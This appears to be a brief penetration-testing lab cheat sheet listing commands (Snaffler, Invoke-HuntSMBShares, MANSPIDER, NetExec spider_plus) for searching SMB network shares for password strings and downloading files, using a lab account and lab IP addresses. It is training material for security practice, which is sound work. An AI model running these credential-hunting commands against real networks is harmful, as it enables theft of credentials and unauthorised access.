Credential Hunting in Network Shares
Hunting from Windows
Snaffler.exe -sInvoke-HuntSMBShares -Threads 100 -OutputDirectory c:\Users\PublicHunting from Linux
docker run --rm -v ./manspider:/root/.manspider blacklanternsecurity/manspider 10.129.234.121 -c 'passw' -u 'mendres' -p 'Inlanefreight2025!'nxc smb 10.129.234.173 -u mendres -p 'Inlanefreight2025!' --spider IT --content --pattern "passw"nxc smb <Target Ip> -u mendres -p Inlanefreight2025! -M spider_plus -o DOWNLOAD_FLAG=True --smb-timeout 60Last updated
Was this helpful?
